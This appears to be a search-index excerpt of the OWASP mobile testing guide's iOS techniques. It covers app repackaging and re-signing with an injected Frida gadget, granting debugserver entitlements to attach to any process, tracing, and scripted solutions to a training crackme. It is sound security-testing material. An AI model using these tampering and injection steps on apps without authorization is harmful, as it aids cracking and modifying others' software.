"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/","title":"Dynamic Analysis on Non-Jailbroken Devices","text":"If you don't have access to a jailbroken device, you can patch and repackage the target app to load a dynamic library at startup (e.g. the Frida gadget to enable dynamic testing with Frida and related tools such as objection). This way, you can instrument the app and do everything you need to do for dynamic analysis (of course, you can't break out of the sandbox this way). However, this technique only works if the app binary isn't FairPlay-encrypted (i.e., obtained from the App Store).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#automated-repackaging","title":"Automated Repackaging","text":"Objection automates the process of app repackaging. You can find exhaustive documentation on the official wiki pages.
Using objection's repackaging feature is sufficient for most use cases. However, in some complex scenarios you might need more fine-grained control or a more customizable repackaging process. In that case, you can read a detailed explanation of the repackaging and resigning process in \"Manual Repackaging\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#manual-repackaging","title":"Manual Repackaging","text":"Thanks to Apple's confusing provisioning and code-signing system, re-signing an app is more challenging than you would expect. iOS won't run an app unless you get the provisioning profile and code signature header exactly right. This requires learning many concepts-certificate types, Bundle IDs, application IDs, team identifiers, and how Apple's build tools connect them. Getting the OS to run a binary that hasn't been built via the default method (Xcode) can be a daunting process.
We'll use optool, Apple's build tools, and some shell commands. Our method is inspired by Vincent Tan's Swizzler project. The NCC group has described an alternative repackaging method.
To reproduce the steps listed below, download UnCrackable App for iOS Level 1 from the OWASP Mobile Testing Guide repository. Our goal is to make the UnCrackable app load FridaGadget.dylib
during startup so we can instrument the app with Frida.
Please note that the following steps apply to macOS only, as Xcode is only available for macOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#getting-a-developer-provisioning-profile-and-certificate","title":"Getting a Developer Provisioning Profile and Certificate","text":"The provisioning profile is a plist file signed by Apple, which adds your code-signing certificate to its list of accepted certificates on one or more devices. In other words, this represents Apple explicitly allowing your app to run for certain reasons, such as debugging on selected devices (development profile). The provisioning profile also includes the entitlements granted to your app. The certificate contains the private key you'll use to sign.
Depending on whether you're registered as an iOS developer, you can obtain a certificate and provisioning profile in one of the following ways:
With an iOS developer account:
If you've developed and deployed iOS apps with Xcode before, you already have your own code-signing certificate installed. Use the security
command (macOS only) to list your signing identities:
$ security find-identity -v\n 1) 61FA3547E0AF42A11E233F6A2B255E6B6AF262CE \"iPhone Distribution: Company Name Ltd.\"\n 2) 8004380F331DCA22CC1B47FB1A805890AE41C938 \"iPhone Developer: Bernhard M\u00fcller (RV852WND79)\"\n
Log into the Apple Developer portal to issue a new App ID, then issue and download the profile. An App ID is a two-part string: a Team ID supplied by Apple and a bundle ID search string that you can set to an arbitrary value, such as com.example.myapp
. Note that you can use a single App ID to re-sign multiple apps. Make sure you create a development profile and not a distribution profile so that you can debug the app.
In the examples below, I use my signing identity, which is associated with my company's development team. I created the App ID \"sg.vp.repackaged\" and the provisioning profile \"AwesomeRepackaging\" for these examples. I ended up with the file AwesomeRepackaging.mobileprovision
-replace this with your own filename in the shell commands below.
With a Regular Apple ID:
Apple will issue a free development provisioning profile even if you're not a paying developer. You can obtain the profile via Xcode and your regular Apple account: simply create an empty iOS project and extract embedded.mobileprovision
from the app container, which is in the Xcode subdirectory of your home directory: ~/Library/Developer/Xcode/DerivedData/<ProjectName>/Build/Products/Debug-iphoneos/<ProjectName>.app/
. The NCC blog post \"iOS instrumentation without jailbreak\" explains this process in great detail.
Once you've obtained the provisioning profile, you can check its contents with the security
command. You'll find the entitlements granted to the app in the profile, along with the allowed certificates and devices. You'll need these for code-signing, so extract them to a separate plist file as shown below. Have a look at the file contents to make sure everything is as expected.
$ security cms -D -i AwesomeRepackaging.mobileprovision > profile.plist\n$ /usr/libexec/PlistBuddy -x -c 'Print :Entitlements' profile.plist > entitlements.plist\n$ cat entitlements.plist\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>LRUD9L355Y.sg.vantagepoint.repackage</string>\n <key>com.apple.developer.team-identifier</key>\n <string>LRUD9L355Y</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>LRUD9L355Y.*</string>\n </array>\n</dict>\n</plist>\n
Note the application identifier, which is a combination of the Team ID (LRUD9L355Y) and Bundle ID (sg.vantagepoint.repackage). This provisioning profile is only valid for the app that has this App ID. The get-task-allow
key is also important: when set to true
, other processes, such as the debugging server, are allowed to attach to the app (consequently, this would be set to false
in a distribution profile).
lsof
is a powerful command, and provides a plethora of information about a running process. It can provide a list of all open files, including a stream, a network file or a regular file. When invoking the lsof
command without any option it will list all open files belonging to all active processes on the system, while when invoking with the flags -c <process name>
or -p <pid>
, it returns the list of open files for the specified process. The man page shows various other options in detail.
Using lsof
for an iOS application running with PID 2828 lists various open files, as shown below.
iPhone:~ root# lsof -p 2828\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\niOweApp 2828 mobile cwd DIR 1,2 864 2 /\niOweApp 2828 mobile txt REG 1,3 206144 189774 /private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\niOweApp 2828 mobile txt REG 1,3 5492 213230 /private/var/mobile/Containers/Data/Application/5AB3E437-9E2D-4F04-BD2B-972F6055699E/tmp/com.apple.dyld/iOweApp-6346DC276FE6865055F1194368EC73CC72E4C5224537F7F23DF19314CF6FD8AA.closure\niOweApp 2828 mobile txt REG 1,3 30628 212198 /private/var/preferences/Logging/.plist-cache.vqXhr1EE\niOweApp 2828 mobile txt REG 1,2 50080 234433 /usr/lib/libobjc-trampolines.dylib\niOweApp 2828 mobile txt REG 1,2 344204 74185 /System/Library/Fonts/AppFonts/ChalkboardSE.ttc\niOweApp 2828 mobile txt REG 1,2 664848 234595 /usr/lib/dyld\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0081/","title":"Get Open Connections","text":"lsof
command when invoked with option -i
, gives the list of open network ports for all active processes on the device. To get a list of open network ports for a specific process, the lsof -i -a -p <pid>
command can be used, where the -a
(AND) option is used for filtering. Below, a filtered output for PID 1 is shown.
iPhone:~ root# lsof -i -a -p 1\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\nlaunchd 1 root 27u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 28u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 29u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 30u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 31u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\nlaunchd 1 root 42u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/","title":"Get Loaded Native Libraries","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-objection","title":"Using Objection","text":"You can use the list_frameworks
command in objection to list all the application's bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-frida","title":"Using Frida","text":"In Frida REPL process related information can be obtained using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[iPhone::com.iOweApp]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x10008c000\",\n \"name\": \"iOweApp\",\n \"path\": \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\",\n \"size\": 49152\n },\n {\n \"base\": \"0x1a1c82000\",\n \"name\": \"Foundation\",\n \"path\": \"/System/Library/Frameworks/Foundation.framework/Foundation\",\n \"size\": 2859008\n },\n {\n \"base\": \"0x1a16f4000\",\n \"name\": \"libobjc.A.dylib\",\n \"path\": \"/usr/lib/libobjc.A.dylib\",\n \"size\": 200704\n },\n\n ...\n
Similarly, information related to various threads can be obtained.
Process.enumerateThreads()\n[\n {\n \"context\": {\n ...\n },\n \"id\": 1287,\n \"state\": \"waiting\"\n },\n\n ...\n
The Process
command exposes multiple functions which can be explored as per needs. Some useful functions are findModuleByAddress
, findModuleByName
and enumerateRanges
besides others.
On iOS, each application gets a sandboxed folder to store its data. As per the iOS security model, an application's sandboxed folder cannot be accessed by another application. Additionally, users do not have direct access to the iOS filesystem, thus preventing browsing or extraction of data from the filesystem. In iOS < 8.3 there were applications available which could be used to browse the device's filesystem, such as iExplorer and iFunBox, but in recent versions of iOS (>8.3) the sandboxing rules are more stringent and these applications do not work anymore. As a result, if you need to access the filesystem, you can only do so on a jailbroken device. As part of the jailbreaking process, the application sandbox protection is disabled, thus enabling easy access to sandboxed folders.
The contents of an application's sandboxed folder has already been discussed in \"Accessing App Data Directories\" in the chapter iOS Basic Security Testing. This chapter gives an overview of the folder structure and which directories you should analyze.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/","title":"Debugging","text":"Coming from a Linux background you'd expect the ptrace
system call to be as powerful as you're used to but, for some reason, Apple decided to leave it incomplete. iOS debuggers such as LLDB use it for attaching, stepping or continuing the process but they cannot use it to read or write memory (all PT_READ_*
and PT_WRITE*
requests are missing). Instead, they have to obtain a so-called Mach task port (by calling task_for_pid
with the target process ID) and then use the Mach IPC interface API functions to perform actions such as suspending the target process and reading/writing register states (thread_get_state
/thread_set_state
) and virtual memory (mach_vm_read
/mach_vm_write
).
For more information you can refer to the LLVM project in GitHub which contains the source code for LLDB as well as Chapter 5 and 13 from \"Mac OS X and iOS Internals: To the Apple's Core\" [#levin] and Chapter 4 \"Tracing and Debugging\" from \"The Mac Hacker's Handbook\" [#miller].
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/#debugging-with-lldb","title":"Debugging with LLDB","text":"The default debugserver executable that Xcode installs can't be used to attach to arbitrary processes (it is usually used only for debugging self-developed apps deployed with Xcode). To enable debugging of third-party apps, the task_for_pid-allow
entitlement must be added to the debugserver executable so that the debugger process can call task_for_pid
to obtain the target Mach task port as seen before. An easy way to do this is to add the entitlement to the debugserver binary shipped with Xcode.
To obtain the executable, mount the following DMG image:
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport/<target-iOS-version>/DeveloperDiskImage.dmg\n
You'll find the debugserver executable in the /usr/bin/
directory on the mounted volume. Copy it to a temporary directory, then create a file called entitlements.plist
with the following content:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/ PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n
Apply the entitlement with codesign:
codesign -s - --entitlements entitlements.plist -f debugserver\n
Copy the modified binary to any directory on the test device. The following examples use usbmuxd to forward a local port through USB.
iproxy 2222 22\nscp -P 2222 debugserver root@localhost:/tmp/\n
Note: On iOS 12 and higher, use the following procedure to sign the debugserver binary obtained from the XCode image.
1) Copy the debugserver binary to the device via scp, for example, in the /tmp folder.
2) Connect to the device via SSH and create the file, named entitlements.xml, with the following content:
```xml\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>platform-application</key>\n <true/>\n <key>com.apple.private.security.no-container</key>\n <true/>\n <key>com.apple.private.skip-library-validation</key>\n <true/>\n <key>com.apple.backboardd.debugapplications</key>\n <true/>\n <key>com.apple.backboardd.launchapplications</key>\n <true/>\n <key>com.apple.diagnosticd.diagnostic</key>\n <true/>\n <key>com.apple.frontboard.debugapplications</key>\n <true/>\n <key>com.apple.frontboard.launchapplications</key>\n <true/>\n <key>com.apple.security.network.client</key>\n <true/>\n <key>com.apple.security.network.server</key>\n <true/>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>com.apple.system-task-ports</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n```\n
3) Type the following command to sign the debugserver binary:
```bash\nldid -Sentitlements.xml debugserver\n```\n
4) Verify that the debugserver binary can be executed via the following command:
```bash\n./debugserver\n```\n
You can now attach debugserver to any process running on the device.
VP-iPhone-18:/tmp root# ./debugserver *:1234 -a 2670\ndebugserver-@(#)PROGRAM:debugserver PROJECT:debugserver-320.2.89\nfor armv7.\nAttaching to process 2670...\n
With the following command you can launch an application via debugserver running on the target device:
debugserver -x backboard *:1234 /Applications/MobileSMS.app/MobileSMS\n
Attach to an already running application:
debugserver *:1234 -a \"MobileSMS\"\n
You may connect now to the iOS device from your host computer:
(lldb) process connect connect://<ip-of-ios-device>:1234\n
Typing image list
gives a list of main executable and all dependent libraries.
In the previous section we learned about how to setup a debugging environment on an iOS device using LLDB. In this section we will use this information and learn how to debug a 3rd party release application. We will continue using the UnCrackable App for iOS Level 1 and solve it using a debugger.
In contrast to a debug build, the code compiled for a release build is optimized to achieve maximum performance and minimum binary build size. As a general best practice, most of the debug symbols are stripped for a release build, adding a layer of complexity when reverse engineering and debugging the binaries.
Due to the absence of the debug symbols, symbol names are missing from the backtrace outputs and setting breakpoints by simply using function names is not possible. Fortunately, debuggers also support setting breakpoints directly on memory addresses. Further in this section we will learn how to do so and eventually solve the crackme challenge.
Some groundwork is needed before setting a breakpoint using memory addresses. It requires determining two offsets:
iOS is a modern operating system with multiple techniques implemented to mitigate code execution attacks, one such technique being Address Space Layout Randomization (ASLR). On every new execution of an application, a random ASLR shift offset is generated, and various of the process's data structures are shifted by this offset.
The final breakpoint address to be used in the debugger is the sum of the above two addresses (Breakpoint offset + ASLR shift offset). This approach assumes that the image base address (discussed shortly) used by the disassembler and iOS is the same, which is true most of the time.
When a binary is opened in a disassembler like Ghidra, it loads a binary by emulating the respective operating system's loader. The address at which the binary is loaded is called image base address. All the code and symbols inside this binary can be addressed using a constant address offset from this image base address. In Ghidra, the image base address can be obtained by determining the address of the start of a Mach-O file. In this case, it is 0x100000000.
From our previous analysis of the UnCrackable App for iOS Level 1 in \"Manual (Reversed) Code Review\" section, the value of the hidden string is stored in a label with the hidden
flag set. In the disassembly, the text value of this label is stored in register X21
, stored via mov
from X0
, at offset 0x100004520. This is our breakpoint offset.
For the second address, we need to determine the ASLR shift offset for a given process. The ASLR offset can be determined by using the LLDB command image list -o -f
. The output is shown in the screenshot below.
In the output, the first column contains the sequence number of the image ([X]), the second column contains the randomly generated ASLR offset, while the third column contains the full path of the image; towards the end, the content in brackets shows the image base address after adding the ASLR offset to the original image base address (0x100000000 + 0x70000 = 0x100070000). You will notice the image base address of 0x100000000 is the same as in Ghidra. Now, to obtain the effective memory address for a code location we only need to add the ASLR offset to the address identified in Ghidra. The effective address to set the breakpoint will be 0x100004520 + 0x70000 = 0x100074520. The breakpoint can be set using the command b 0x100074520
.
In the above output, you may also notice that many of the paths listed as images do not point to the file system on the iOS device. Instead, they point to a certain location on the host computer on which LLDB is running. These images are system libraries for which debug symbols are available on the host computer to aid in application development and debugging (as part of the Xcode iOS SDK). Therefore, you may set breakpoints to these libraries directly by using function names.
After putting the breakpoint and running the app, the execution will be halted once the breakpoint is hit. Now you can access and explore the current state of the process. In this case, you know from the previous static analysis that the register X0
contains the hidden string, thus let's explore it. In LLDB you can print Objective-C objects using the po
(print object) command.
Voila, the crackme can be easily solved aided by static analysis and a debugger. There is a plethora of features implemented in LLDB, including changing the value of the registers, changing values in the process memory and even automating tasks using Python scripts.
Officially Apple recommends use of LLDB for debugging purposes, but GDB can be also used on iOS. The techniques discussed above are applicable while debugging using GDB as well, provided the LLDB specific commands are changed to GDB commands.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0085/","title":"Execution Tracing","text":"Tracing involves recording the information about a program's execution. In contrast to Android, there are limited options available for tracing various aspects of an iOS app. In this section we will be heavily relying on tools such as Frida for performing tracing.
TODO: This needs to be improved as well
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0086/","title":"Method Tracing","text":"Intercepting Objective-C methods is a useful iOS security testing technique. For example, you may be interested in data storage operations or network requests. In the following example, we'll write a simple tracer for logging HTTP(S) requests made via iOS standard HTTP APIs. We'll also show you how to inject the tracer into the Safari web browser.
In the following examples, we'll assume that you are working on a jailbroken device. If that's not the case, you first need to follow the steps outlined in section Repackaging and Re-Signing to repackage the Safari app.
Frida comes with frida-trace
, a function tracing tool. frida-trace
accepts Objective-C methods via the -m
flag. You can pass it wildcards as well-given -[NSURL *]
, for example, frida-trace
will automatically install hooks on all NSURL
class selectors. We'll use this to get a rough idea about which library functions Safari calls when the user opens a URL.
Run Safari on the device and make sure the device is connected via USB. Then start frida-trace
as follows:
$ frida-trace -U -m \"-[NSURL *]\" Safari\nInstrumenting functions...\n-[NSURL isMusicStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isMusicStoreURL_.js\"\n-[NSURL isAppStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isAppStoreURL_.js\"\n(...)\nStarted tracing 248 functions. Press Ctrl+C to stop.\n
Next, navigate to a new website in Safari. You should see traced function calls on the frida-trace
console. Note that the initWithURL:
method is called to initialize a new URL request object.
/* TID 0xc07 */\n 20313 ms -[NSURLRequest _initWithCFURLRequest:0x1043bca30 ]\n 20313 ms -[NSURLRequest URL]\n(...)\n 21324 ms -[NSURLRequest initWithURL:0x106388b00 ]\n 21324 ms | -[NSURLRequest initWithURL:0x106388b00 cachePolicy:0x0 timeoutInterval:0x106388b80\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0087/","title":"Native Code Tracing","text":"As discussed earlier in this chapter, iOS applications can also contain native code (C/C++ code) and it can be traced using the frida-trace
CLI as well. For example, you can trace calls to the open
function by running the following command:
frida-trace -U -i \"open\" sg.vp.UnCrackable1\n
The overall approach and further improvisation for tracing native code using Frida is similar to the one discussed in the Android \"Tracing\" section.
Unfortunately, there are no tools such as strace
or ftrace
available to trace syscalls or function calls of an iOS app. Only DTrace
exists, which is a very powerful and versatile tracing tool, but it's only available for macOS and not for iOS.
Apple provides a simulator app within Xcode which offers a user interface that looks like a real iOS device for iPhone, iPad or Apple Watch. It allows you to rapidly prototype and test debug builds of your applications during the development process, but it is actually not an emulator. The difference between a simulator and an emulator was previously discussed in the \"Emulation-based Dynamic Analysis\" section.
While developing and debugging an application, the Xcode toolchain generates x86 code, which can be executed in the iOS simulator. However, for a release build, only ARM code is generated (incompatible with the iOS simulator). That's why applications downloaded from the Apple App Store cannot be used for any kind of application analysis on the iOS simulator.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#corellium","title":"Corellium","text":"Corellium is a commercial tool which offers virtual iOS devices running actual iOS firmware, being the only publicly available iOS emulator ever. Since it is a proprietary product, not much information is available about the implementation. Corellium has no community licenses available, therefore we won't go into much detail regarding its use.
Corellium allows you to launch multiple instances of a device (jailbroken or not) which are accessible as local devices (with a simple VPN configuration). It has the ability to take and restore snapshots of the device state, and also offers a convenient web-based shell to the device. Finally and most importantly, due to its \"emulator\" nature, you can execute applications downloaded from the Apple App Store, enabling any kind of application analysis as you know it from real iOS (jailbroken) devices.
Note that in order to install an IPA on Corellium devices it has to be unencrypted and signed with a valid Apple developer certificate. See more information here.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#unicorn","title":"Unicorn","text":"Unicorn is a lightweight, multi-architecture CPU emulator framework based on QEMU and goes beyond it by adding useful features especially made for CPU emulation. Unicorn provides the basic infrastructure needed to execute processor instructions. In this section we will use Unicorn's Python bindings to solve the UnCrackable App for iOS Level 1 challenge.
To use Unicorn's full power, we would need to implement all the necessary infrastructure which generally is readily available from the operating system, e.g. binary loader, linker and other dependencies, or use other higher-level frameworks such as Qiling, which leverages Unicorn to emulate CPU instructions but understands the OS context. However, this is superfluous for this very localized challenge where only executing a small part of the binary will suffice.
While performing manual analysis in \"Reviewing Disassembled Native Code\" section, we determined that the function at address 0x1000080d4 is responsible for dynamically generating the secret string. As we're about to see, all the necessary code is pretty much self-contained in the binary, making this a perfect scenario to use a CPU emulator like Unicorn.
If we analyze that function and the subsequent function calls, we will observe that there is no hard dependency on any external library and neither it's performing any system calls. The only access external to the functions occurs for instance at address 0x1000080f4, where a value is being stored to address 0x10000dbf0, which maps to the __data
section.
Therefore, in order to correctly emulate this section of the code, apart from the __text
section (which contains the instructions) we also need to load the __data
section.
To solve the challenge using Unicorn we will perform the following steps:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).__text
and __data
section from the binary.__text
and __data
section.To extract the content of __text
and __data
section from the Mach-O binary we will use LIEF, which provides a convenient abstraction to manipulate multiple executable file formats. Before loading these sections to memory, we need to determine their base addresses, e.g. by using Ghidra, Radare2 or IDA Pro.
From the above table, we will use the base address 0x10000432c for __text
and 0x10000d3e8 for __data
section to load them at in the memory.
While allocating memory for Unicorn, the memory addresses should be 4k page aligned and also the allocated size should be a multiple of 1024.
The following script emulates the function at 0x1000080d4 and dumps the secret string:
import lief\nfrom unicorn import *\nfrom unicorn.arm64_const import *\n\n# --- Extract __text and __data section content from the binary ---\nbinary = lief.parse(\"uncrackable.arm64\")\ntext_section = binary.get_section(\"__text\")\ntext_content = text_section.content\n\ndata_section = binary.get_section(\"__data\")\ndata_content = data_section.content\n\n# --- Setup Unicorn for ARM64 execution ---\narch = \"arm64le\"\nemu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)\n\n# --- Create Stack memory ---\naddr = 0x40000000\nsize = 1024*1024\nemu.mem_map(addr, size)\nemu.reg_write(UC_ARM64_REG_SP, addr + size - 1)\n\n# --- Load text section --\nbase_addr = 0x100000000\ntmp_len = 1024*1024\ntext_section_load_addr = 0x10000432c\nemu.mem_map(base_addr, tmp_len)\nemu.mem_write(text_section_load_addr, bytes(text_content))\n\n# --- Load data section ---\ndata_section_load_addr = 0x10000d3e8\nemu.mem_write(data_section_load_addr, bytes(data_content))\n\n# --- Hack for stack_chk_guard ---\n# without this will throw invalid memory read at 0x0\nemu.mem_map(0x0, 1024)\nemu.mem_write(0x0, b\"00\")\n\n\n# --- Execute from 0x1000080d4 to 0x100008154 ---\nemu.emu_start(0x1000080d4, 0x100008154)\nret_value = emu.reg_read(UC_ARM64_REG_X0)\n\n# --- Dump return value ---\nprint(emu.mem_read(ret_value, 11))\n
You may notice that there is an additional memory allocation at address 0x0, this is a simple hack around stack_chk_guard
check. Without this, there will be an invalid memory read error and the binary cannot be executed. With this hack, the program will access the value at 0x0 and use it for the stack_chk_guard
check.
To summarize, using Unicorn does require some additional setup before executing the binary, but once done, this tool can help to provide deep insights into the binary. It provides the flexibility to execute the full binary or a limited part of it. Unicorn also exposes APIs to attach hooks to the execution. Using these hooks you can observe the state of the program at any point during the execution, or even manipulate register or variable values and forcefully explore other execution branches in a program. Another advantage when running a binary in Unicorn is that you don't need to worry about various checks like root/jailbreak detection or debugger detection etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/","title":"Symbolic Execution","text":"An introduction to binary analysis using binary analysis frameworks has already been discussed in the \"Dynamic Analysis\" section for Android. We recommend you to revisit this section and refresh the concepts on this subject.
For Android, we used Angr's symbolic execution engine to solve a challenge. In this section, we will firstly use Unicorn to solve the UnCrackable App for iOS Level 1 challenge and then we will revisit the Angr binary analysis framework to analyze the challenge but instead of symbolic execution we will use its concrete execution (or dynamic execution) features.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/#angr","title":"Angr","text":"Angr is a very versatile tool, providing multiple techniques to facilitate binary analysis, while supporting various file formats and hardware instructions sets.
The Mach-O backend in Angr is not well-supported, but it works perfectly fine for our case.
While manually analyzing the code in the \"Reviewing Disassembled Native Code\" section, we reached a point where performing further manual analysis was cumbersome. The function at offset 0x1000080d4
was identified as the final target which contains the secret string.
If we revisit that function, we can see that it involves multiple sub-function calls and interestingly none of these functions have any dependencies on other library calls or system calls. This is a perfect case to use Angr's concrete execution engine. Follow the steps below to solve this challenge:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).Project
by loading the above binary.callable
object by passing the address of the function to be executed. From the Angr documentation: \"A Callable is a representation of a function in the binary that can be interacted with like a native python function.\".callable
object to the concrete execution engine, which in this case is claripy.backends.concrete
.import angr\nimport claripy\n\ndef solve():\n\n # Load the binary by creating angr project.\n project = angr.Project('uncrackable.arm64')\n\n # Pass the address of the function to the callable\n func = project.factory.callable(0x1000080d4)\n\n # Get the return value of the function\n ptr_secret_string = claripy.backends.concrete.convert(func()).value\n print(\"Address of the pointer to the secret string: \" + hex(ptr_secret_string))\n\n # Extract the value from the pointer to the secret string\n secret_string = func.result_state.mem[ptr_secret_string].string.concrete\n print(f\"Secret String: {secret_string}\")\n\nsolve()\n
Above, Angr executed an ARM64 code in an execution environment provided by one of its concrete execution engines. The result is accessed from the memory as if the program is executed on a real device. This case is a good example where binary analysis frameworks enable us to perform a comprehensive analysis of a binary, even in the absence of specialized devices needed to run it.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/","title":"Patching","text":"IPA files are actually ZIP archives, so you can use any ZIP tool to unpack the archive.
unzip UnCrackable-Level1.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-installing-frida-gadget","title":"Patching Example: Installing Frida Gadget","text":"If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable_Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable-Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0091/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
Tampering with an app invalidates the main executable's code signature, so this won't run on a non-jailbroken device. You'll need to replace the provisioning profile and sign both the main executable and the files you've included (e.g. FridaGadget.dylib
) with the certificate listed in the profile.
First, let's add our own provisioning profile to the package:
cp AwesomeRepackaging.mobileprovision Payload/UnCrackable\\ Level\\ 1.app/embedded.mobileprovision\n
Next, we need to make sure that the Bundle ID in Info.plist
matches the one specified in the profile because the codesign tool will read the Bundle ID from Info.plist
during signing; the wrong value will lead to an invalid signature.
/usr/libexec/PlistBuddy -c \"Set :CFBundleIdentifier sg.vantagepoint.repackage\" Payload/UnCrackable\\ Level\\ 1.app/Info.plist\n
